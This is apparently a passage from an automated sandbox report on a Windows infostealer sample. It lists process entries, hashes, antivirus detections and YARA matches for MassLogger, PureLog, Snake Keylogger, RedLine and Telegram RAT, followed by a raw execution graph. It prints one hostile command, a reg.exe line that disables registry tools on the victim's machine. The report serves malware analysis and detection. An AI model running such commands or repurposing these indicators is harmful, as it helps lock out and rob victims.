                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:02:29:22
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:02:29:28
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\Uhzauuil.PIF
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Libraries\Uhzauuil.PIF"
                                                                                      Imagebase:0x400000
                                                                                      File size:854'016 bytes
                                                                                      MD5 hash:4692AEE744A1B1FAB794FF334A77A462
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 42%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:02:29:29
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:175'800 bytes
                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.3089643523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:14
                                                                                      Start time:02:29:35
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                      Imagebase:0x550000
                                                                                      File size:59'392 bytes
                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:15
                                                                                      Start time:02:29:35
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:16
                                                                                      Start time:02:29:37
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\Uhzauuil.PIF
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Libraries\Uhzauuil.PIF"
                                                                                      Imagebase:0x400000
                                                                                      File size:854'016 bytes
                                                                                      MD5 hash:4692AEE744A1B1FAB794FF334A77A462
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Has exited:true

                                                                                      Target ID:17
                                                                                      Start time:02:29:37
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:175'800 bytes
                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000002.3089641728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3110411476.000000001C8BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Has exited:false

                                                                                      Target ID:18
                                                                                      Start time:02:29:42
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                      Imagebase:0x550000
                                                                                      File size:59'392 bytes
                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:19
                                                                                      Start time:02:29:42
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:16.8%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:29.3%
                                                                                        Total number of Nodes:1694
                                                                                        Total number of Limit Nodes:17
31210 27d4860 11 API calls 31218 27f9a09 31210->31218 31214 27d4860 11 API calls 31211->31214 31215 27d47ec 11 API calls 31212->31215 31217 27f9cbb 31213->31217 31220 27f805a 31214->31220 31221 27fa1b4 31215->31221 31219 27d47ec 11 API calls 31216->31219 31222 27d47ec 11 API calls 31217->31222 31223 27d47ec 11 API calls 31218->31223 31227 27f8c4d 31219->31227 31224 27d47ec 11 API calls 31220->31224 31225 27e889c 22 API calls 31221->31225 31229 27f9cf2 31222->31229 31230 27f9a40 31223->31230 31231 27f8091 31224->31231 31226 27fa1d8 31225->31226 31228 27d4860 11 API calls 31226->31228 31232 27e889c 22 API calls 31227->31232 31241 27fa1f9 31228->31241 31233 27e889c 22 API calls 31229->31233 31234 27e889c 22 API calls 31230->31234 31237 27e889c 22 API calls 31231->31237 31235 27f8c71 31232->31235 31238 27f9d16 31233->31238 31239 27f9a64 31234->31239 31236 27d4860 11 API calls 31235->31236 31245 27f8c92 31236->31245 31240 27f80b5 31237->31240 31242 27d4860 11 API calls 31238->31242 31243 27d4860 11 API calls 31239->31243 31246 27d49f8 11 API calls 31240->31246 31244 27d47ec 11 API calls 31241->31244 31247 27f9d37 31242->31247 31248 27f9a85 31243->31248 31252 27fa230 31244->31252 31250 27d47ec 11 API calls 31245->31250 31249 27f80d2 31246->31249 31253 27d47ec 11 API calls 31247->31253 31254 27d47ec 11 API calls 31248->31254 32159 27e7e50 17 API calls 31249->32159 31258 27f8cc9 31250->31258 31257 27e889c 22 API calls 31252->31257 31259 27f9d6e 31253->31259 31260 27f9abc 31254->31260 31255 27f80d8 31256 27d4860 11 API calls 31255->31256 31261 27f80f9 31256->31261 31263 27fa254 31257->31263 31262 27e889c 22 API calls 31258->31262 31264 27e889c 22 API calls 31259->31264 31265 27e889c 22 API calls 31260->31265 31267 27d47ec 11 API calls 31261->31267 31266 27f8ced 31262->31266 31271 27e889c 22 API calls 31263->31271 31268 27f9d92 31264->31268 31269 27f9ae0 31265->31269 31270 27d4860 11 API calls 31266->31270 31275 27f8130 31267->31275 31272 27d4860 11 API calls 31268->31272 
31273 27d4860 11 API calls 31269->31273 31274 27f8d0e 31270->31274 31277 27fa287 31271->31277 31278 27f9db3 31272->31278 31276 27f9b01 31273->31276 31279 27d47ec 11 API calls 31274->31279 31280 27e889c 22 API calls 31275->31280 31283 27d47ec 11 API calls 31276->31283 31281 27e889c 22 API calls 31277->31281 31282 27d47ec 11 API calls 31278->31282 31286 27f8d45 31279->31286 31284 27f8154 31280->31284 31287 27fa2ba 31281->31287 31288 27f9dea 31282->31288 31289 27f9b38 31283->31289 31285 27d4860 11 API calls 31284->31285 31291 27f8175 31285->31291 31290 27e889c 22 API calls 31286->31290 31292 27e889c 22 API calls 31287->31292 31293 27e889c 22 API calls 31288->31293 31294 27e889c 22 API calls 31289->31294 31295 27f8d69 31290->31295 31296 27d47ec 11 API calls 31291->31296 31305 27fa2ed 31292->31305 31297 27f9e0e 31293->31297 31298 27f9b5c 31294->31298 31299 27f8d89 31295->31299 31300 27f8d72 31295->31300 31306 27f81ac 31296->31306 31301 27d4860 11 API calls 31297->31301 31302 27d4860 11 API calls 31298->31302 31304 27d4860 11 API calls 31299->31304 32162 27e85fc 17 API calls 31300->32162 31309 27f9e2f 31301->31309 31310 27f9b7d 31302->31310 31307 27f8daa 31304->31307 31308 27e889c 22 API calls 31305->31308 31311 27e889c 22 API calls 31306->31311 31313 27d47ec 11 API calls 31307->31313 31317 27fa320 31308->31317 31315 27d47ec 11 API calls 31309->31315 31312 27d47ec 11 API calls 31310->31312 31314 27f81d0 31311->31314 31320 27f9bb4 31312->31320 31321 27f8de1 31313->31321 31316 27d4860 11 API calls 31314->31316 31319 27f9e66 31315->31319 31323 27f81f1 31316->31323 31318 27e889c 22 API calls 31317->31318 31322 27fa353 31318->31322 31325 27e889c 22 API calls 31319->31325 31326 27e889c 22 API calls 31320->31326 31327 27e889c 22 API calls 31321->31327 31324 27d4860 11 API calls 31322->31324 31331 27d47ec 11 API calls 31323->31331 31336 27fa374 31324->31336 31328 27f9e8a 31325->31328 31329 27f9bd8 31326->31329 31330 27f8e05 31327->31330 31726 27d49f8 31328->31726 31333 27d4860 
11 API calls 31329->31333 31334 27d4860 11 API calls 31330->31334 31338 27f8228 31331->31338 31341 27f9bf9 31333->31341 31339 27f8e26 31334->31339 31340 27d47ec 11 API calls 31336->31340 31342 27e889c 22 API calls 31338->31342 31343 27d47ec 11 API calls 31339->31343 31347 27fa3ab 31340->31347 31345 27d47ec 11 API calls 31341->31345 31344 27f824c 31342->31344 31350 27f8e5d 31343->31350 31346 27d4860 11 API calls 31344->31346 31349 27f9c30 31345->31349 31352 27f826d 31346->31352 31348 27e889c 22 API calls 31347->31348 31351 27fa3cf 31348->31351 31354 27e889c 22 API calls 31349->31354 31355 27e889c 22 API calls 31350->31355 31353 27d4860 11 API calls 31351->31353 31357 27d47ec 11 API calls 31352->31357 31359 27fa3f0 31353->31359 31364 27f9c54 31354->31364 31356 27f8e81 31355->31356 31358 27d4860 11 API calls 31356->31358 31360 27f82a4 31357->31360 31362 27f8ea2 31358->31362 31361 27d47ec 11 API calls 31359->31361 31363 27e889c 22 API calls 31360->31363 31369 27fa427 31361->31369 31365 27d47ec 11 API calls 31362->31365 31366 27f82c8 31363->31366 31711 27edf80 31364->31711 31370 27f8ed9 31365->31370 32160 27eafd0 41 API calls 31366->32160 31371 27e889c 22 API calls 31369->31371 31373 27e889c 22 API calls 31370->31373 31375 27fa44b 31371->31375 31372 27f82d9 31374 27f8efd ResumeThread 31373->31374 31376 27d4860 11 API calls 31374->31376 31377 27e889c 22 API calls 31375->31377 31380 27f8f29 31376->31380 31378 27fa47e 31377->31378 31379 27d4860 11 API calls 31378->31379 31382 27fa49f 31379->31382 31381 27d47ec 11 API calls 31380->31381 31383 27f8f60 31381->31383 31384 27d47ec 11 API calls 31382->31384 31385 27e889c 22 API calls 31383->31385 31387 27fa4d6 31384->31387 31386 27f8f84 31385->31386 31388 27d4860 11 API calls 31386->31388 31389 27e889c 22 API calls 31387->31389 31392 27f8fa5 31388->31392 31390 27fa4fa 31389->31390 31391 27d4860 11 API calls 31390->31391 31394 27fa51b 31391->31394 31393 27d47ec 11 API calls 31392->31393 31395 27f8fdc 31393->31395 31396 27d47ec 11 
API calls 31394->31396 31397 27e889c 22 API calls 31395->31397 31400 27fa552 31396->31400 31398 27f9000 31397->31398 31399 27d4860 11 API calls 31398->31399 31404 27f9021 31399->31404 31401 27e889c 22 API calls 31400->31401 31402 27fa576 31401->31402 31403 27d4860 11 API calls 31402->31403 31406 27fa597 31403->31406 31405 27d47ec 11 API calls 31404->31405 31408 27f9058 31405->31408 31407 27d47ec 11 API calls 31406->31407 31412 27fa5ce 31407->31412 31409 27e889c 22 API calls 31408->31409 31410 27f907c CloseHandle 31409->31410 31411 27d4860 11 API calls 31410->31411 31414 27f90a8 31411->31414 31413 27e889c 22 API calls 31412->31413 31415 27fa5f2 31413->31415 31416 27d47ec 11 API calls 31414->31416 31417 27e889c 22 API calls 31415->31417 31418 27f90df 31416->31418 31419 27fa625 31417->31419 31420 27e889c 22 API calls 31418->31420 31423 27e889c 22 API calls 31419->31423 31421 27f9103 31420->31421 31422 27d4860 11 API calls 31421->31422 31424 27f9124 31422->31424 31425 27fa658 31423->31425 31427 27d47ec 11 API calls 31424->31427 31426 27e889c 22 API calls 31425->31426 31428 27fa68b 31426->31428 31429 27f915b 31427->31429 31430 27e889c 22 API calls 31428->31430 31431 27e889c 22 API calls 31429->31431 31432 27fa6be 31430->31432 31433 27f917f 31431->31433 31434 27d4860 11 API calls 31432->31434 31435 27d4860 11 API calls 31433->31435 31437 27fa6df 31434->31437 31436 27f91a0 31435->31436 31438 27d47ec 11 API calls 31436->31438 31439 27d47ec 11 API calls 31437->31439 31441 27f91d7 31438->31441 31440 27fa716 31439->31440 31442 27e889c 22 API calls 31440->31442 31443 27e889c 22 API calls 31441->31443 31444 27fa73a 31442->31444 31445 27f91fb 31443->31445 31446 27d4860 11 API calls 31444->31446 31447 27d4860 11 API calls 31445->31447 31449 27fa75b 31446->31449 31448 27f921c 31447->31448 31450 27d47ec 11 API calls 31448->31450 31451 27d47ec 11 API calls 31449->31451 31453 27f9253 31450->31453 31452 27fa792 31451->31452 31454 27e889c 22 API calls 31452->31454 31455 27e889c 22 API 
calls 31453->31455 31458 27fa7b6 31454->31458 31456 27f9277 31455->31456 31457 27d4860 11 API calls 31456->31457 31460 27f9298 31457->31460 31459 27e889c 22 API calls 31458->31459 31462 27fa7e9 31459->31462 31461 27d47ec 11 API calls 31460->31461 31463 27f92cf 31461->31463 31464 27e889c 22 API calls 31462->31464 31465 27e889c 22 API calls 31463->31465 31467 27fa81c 31464->31467 31466 27f92f3 31465->31466 31468 27d4860 11 API calls 31466->31468 31469 27e889c 22 API calls 31467->31469 31470 27f9314 31468->31470 31471 27fa84f 31469->31471 31472 27d47ec 11 API calls 31470->31472 31473 27e889c 22 API calls 31471->31473 31474 27f934b 31472->31474 31476 27fa882 31473->31476 31475 27e889c 22 API calls 31474->31475 31477 27f936f 31475->31477 31478 27e889c 22 API calls 31476->31478 31479 27d4860 11 API calls 31477->31479 31480 27fa8b5 31478->31480 31482 27f9390 31479->31482 31481 27d4860 11 API calls 31480->31481 31483 27fa8d6 31481->31483 31484 27d47ec 11 API calls 31482->31484 31485 27d47ec 11 API calls 31483->31485 31486 27f93c7 31484->31486 31488 27fa90d 31485->31488 31487 27e889c 22 API calls 31486->31487 31489 27f93eb 31487->31489 31490 27e889c 22 API calls 31488->31490 32163 27e8818 LoadLibraryW 31489->32163 31491 27fa931 31490->31491 31492 27d4860 11 API calls 31491->31492 31497 27fa952 31492->31497 31495 27e8818 21 API calls 31496 27f941e 31495->31496 31498 27e8818 21 API calls 31496->31498 31500 27d47ec 11 API calls 31497->31500 31499 27f9432 31498->31499 31501 27e8818 21 API calls 31499->31501 31506 27fa989 31500->31506 31502 27f9446 31501->31502 31503 27e8818 21 API calls 31502->31503 31504 27f945a 31503->31504 31505 27e8818 21 API calls 31504->31505 31507 27f946e CloseHandle 31505->31507 31509 27e889c 22 API calls 31506->31509 31508 27d4860 11 API calls 31507->31508 31512 27f949a 31508->31512 31510 27fa9ad 31509->31510 31511 27d4860 11 API calls 31510->31511 31513 27fa9ce 31511->31513 31514 27d47ec 11 API calls 31512->31514 31515 27d47ec 11 API calls 
31513->31515 31516 27f94d1 31514->31516 31517 27faa05 31515->31517 31518 27e889c 22 API calls 31516->31518 31521 27e889c 22 API calls 31517->31521 31519 27f94f5 31518->31519 31520 27d4860 11 API calls 31519->31520 31524 27f9516 31520->31524 31522 27faa29 31521->31522 31523 27d4860 11 API calls 31522->31523 31525 27faa4a 31523->31525 31526 27d47ec 11 API calls 31524->31526 31527 27d47ec 11 API calls 31525->31527 31528 27f954d 31526->31528 31529 27faa81 31527->31529 31530 27e889c 22 API calls 31528->31530 31531 27e889c 22 API calls 31529->31531 31530->30991 31532 27faaa5 31531->31532 31533 27d4860 11 API calls 31532->31533 31534 27faac6 31533->31534 31535 27d47ec 11 API calls 31534->31535 31536 27faafd 31535->31536 31537 27e889c 22 API calls 31536->31537 31538 27fab21 31537->31538 31539 27e889c 22 API calls 31538->31539 31540 27fab30 31539->31540 31541 27e889c 22 API calls 31540->31541 31542 27fab3f 31541->31542 31543 27e889c 22 API calls 31542->31543 31544 27fab4e 31543->31544 31545 27e889c 22 API calls 31544->31545 31546 27fab5d 31545->31546 31547 27e889c 22 API calls 31546->31547 31548 27fab6c 31547->31548 31549 27e889c 22 API calls 31548->31549 31550 27fab7b 31549->31550 31551 27e889c 22 API calls 31550->31551 31552 27fab8a 31551->31552 31553 27e889c 22 API calls 31552->31553 31554 27fab99 31553->31554 31555 27e889c 22 API calls 31554->31555 31556 27faba8 31555->31556 31557 27e889c 22 API calls 31556->31557 31558 27fabb7 31557->31558 31559 27e889c 22 API calls 31558->31559 31560 27fabc6 31559->31560 31561 27e889c 22 API calls 31560->31561 31562 27fabd5 31561->31562 31563 27e889c 22 API calls 31562->31563 31564 27fabe4 31563->31564 31565 27e889c 22 API calls 31564->31565 31566 27fabf3 31565->31566 31567 27e889c 22 API calls 31566->31567 31568 27fac02 31567->31568 31569 27d4860 11 API calls 31568->31569 31570 27fac23 31569->31570 31571 27d47ec 11 API calls 31570->31571 31572 27fac5a 31571->31572 31573 27e889c 22 API calls 31572->31573 31574 27fac7e 31573->31574 
31575 27e889c 22 API calls 31574->31575 31576 27facb1 31575->31576 31577 27e889c 22 API calls 31576->31577 31578 27face4 31577->31578 31579 27e889c 22 API calls 31578->31579 31580 27fad17 31579->31580 31581 27e889c 22 API calls 31580->31581 31582 27fad4a 31581->31582 31583 27e889c 22 API calls 31582->31583 31584 27fad7d 31583->31584 31585 27e889c 22 API calls 31584->31585 31586 27fadb0 31585->31586 31587 27e889c 22 API calls 31586->31587 31588 27fade3 31587->31588 31589 27d4860 11 API calls 31588->31589 31590 27fae04 31589->31590 31591 27d47ec 11 API calls 31590->31591 31592 27fae3b 31591->31592 31593 27e889c 22 API calls 31592->31593 31594 27fae5f 31593->31594 31595 27d4860 11 API calls 31594->31595 31596 27fae80 31595->31596 31597 27d47ec 11 API calls 31596->31597 31598 27faeb7 31597->31598 31599 27e889c 22 API calls 31598->31599 31600 27faedb 31599->31600 31601 27d4860 11 API calls 31600->31601 31602 27faefc 31601->31602 31603 27d47ec 11 API calls 31602->31603 31604 27faf33 31603->31604 31605 27e889c 22 API calls 31604->31605 31606 27faf57 31605->31606 31607 27e889c 22 API calls 31606->31607 31608 27faf8a 31607->31608 31609 27e889c 22 API calls 31608->31609 31610 27fafbd 31609->31610 31611 27e889c 22 API calls 31610->31611 31612 27faff0 31611->31612 31613 27e889c 22 API calls 31612->31613 31614 27fb023 31613->31614 31615 27e889c 22 API calls 31614->31615 31616 27fb056 31615->31616 31617 27e889c 22 API calls 31616->31617 31618 27fb089 31617->31618 31619 27e889c 22 API calls 31618->31619 31620 27fb0bc 31619->31620 31621 27e889c 22 API calls 31620->31621 31622 27fb0ef 31621->31622 31623 27e889c 22 API calls 31622->31623 31624 27fb122 31623->31624 31625 27e889c 22 API calls 31624->31625 31626 27fb155 31625->31626 31627 27e889c 22 API calls 31626->31627 31628 27fb188 31627->31628 31629 27e889c 22 API calls 31628->31629 31630 27fb1bb 31629->31630 31631 27e889c 22 API calls 31630->31631 31632 27fb1ee 31631->31632 31633 27e889c 22 API calls 31632->31633 31634 27fb221 
31633->31634 31635 27e889c 22 API calls 31634->31635 31636 27fb254 31635->31636 31637 27e889c 22 API calls 31636->31637 31638 27fb287 31637->31638 31639 27e889c 22 API calls 31638->31639 31640 27fb2ba 31639->31640 31641 27e889c 22 API calls 31640->31641 31642 27fb2ed 31641->31642 31643 27e889c 22 API calls 31642->31643 31644 27fb320 31643->31644 32133 27e8204 31644->32133 31647 27d4860 11 API calls 31648 27fb350 31647->31648 31649 27d47ec 11 API calls 31648->31649 31650 27fb387 31649->31650 31651 27e889c 22 API calls 31650->31651 31652 27fb3ab 31651->31652 31653 27d4860 11 API calls 31652->31653 31654 27fb3cc 31653->31654 31655 27d47ec 11 API calls 31654->31655 31656 27fb403 31655->31656 31657 27e889c 22 API calls 31656->31657 31658 27fb427 31657->31658 31659 27d4860 11 API calls 31658->31659 31660 27fb448 31659->31660 31661 27d47ec 11 API calls 31660->31661 31662 27fb47f 31661->31662 31663 27e889c 22 API calls 31662->31663 31664 27fb4a3 ExitProcess 31663->31664 31666 27e88b0 31665->31666 31667 27e88cf LoadLibraryA 31666->31667 32170 27d49a0 31667->32170 31670 27d49a0 31671 27e88f2 GetProcAddress 31670->31671 31672 27e8919 31671->31672 31673 27e7d78 18 API calls 31672->31673 31674 27e895d FreeLibrary 31673->31674 31675 27e8975 31674->31675 31676 27d4500 11 API calls 31675->31676 31677 27e8982 31676->31677 31677->30855 31679 27ee408 31678->31679 31680 27ee48b 31679->31680 31683 27d49f8 11 API calls 31679->31683 31681 27d44dc 11 API calls 31680->31681 31682 27ee493 31681->31682 31684 27d4530 11 API calls 31682->31684 31683->31679 31685 27ee49e 31684->31685 31686 27d4500 11 API calls 31685->31686 31687 27ee4b8 31686->31687 31687->30882 31689 27ef51f 31688->31689 31690 27ef54a RegOpenKeyA 31689->31690 31691 27ef558 31690->31691 31692 27d49f8 11 API calls 31691->31692 31693 27ef570 31692->31693 31694 27ef57d 